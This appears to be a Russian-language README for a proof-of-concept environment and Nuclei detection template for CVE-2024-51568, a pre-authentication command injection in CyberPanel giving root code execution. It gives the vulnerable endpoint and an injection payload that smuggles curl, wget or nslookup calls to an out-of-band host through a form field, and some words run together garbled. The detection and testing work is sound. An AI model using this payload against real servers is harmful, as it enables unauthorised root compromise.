
Среда PoC и шаблон Nuclei для тестирования CVE-2024-51568, уязвимость внедрения команд до аутентификации в CyberPanel, позволяющая выполнение удалённого кода с привилегиями root.
Среда для подтверждения концепции и шаблон Nuclei для тестирования CVE-2024-51568, критической уязвимости инъекции команд без аутентификации в CyberPanel.
/filemanager/uploadcompletePathcd docker/
docker-compose up -d --build
curl -I http://localhost:8090
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090
Пример вывода:
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] шаблоны nuclei не установлены, устанавливаю...
[INF] Шаблоны nuclei успешно установлены в /root/nuclei-templates
[WRN] Загружается 1 неподписанный шаблон для сканирования. Используйте с осторожностью.
[INF] Текущая версия nuclei: v3.4.10 (последняя)
[INF] Текущая версия nuclei-templates: v10.2.8 (последняя)
[INF] В последнем выпуске добавлено 114 новых шаблонов
[INF] Загружено шаблонов для текущего сканирования: 1
[INF] Загружено целей для текущего сканирования: 1
[INF] Используется сервер Interactsh: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Сканирование завершено за 5.706766772 с. Найдено 1 совпадение.
CyberPanel v2.3.4 содержит ошибку инъекции команд в функциональности загрузки файлов:
POST /filemanager/uploadcompletePath в многокомпонентных данных формыProcessUtilities.outputExecutioner()completePath/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #
Эта полезная нагрузка обеспечивает надежное обнаружение в различных конфигурациях системы.
Эта среда содержит намеренные уязвимости для целей исследования безопасности и обучения:
Это подтверждение концепции предоставлено только для образовательных целей и авторизованного тестирования безопасности. Пользователи несут ответственность за соблюдение применимых законов и получение надлежащего разрешения перед тестированием.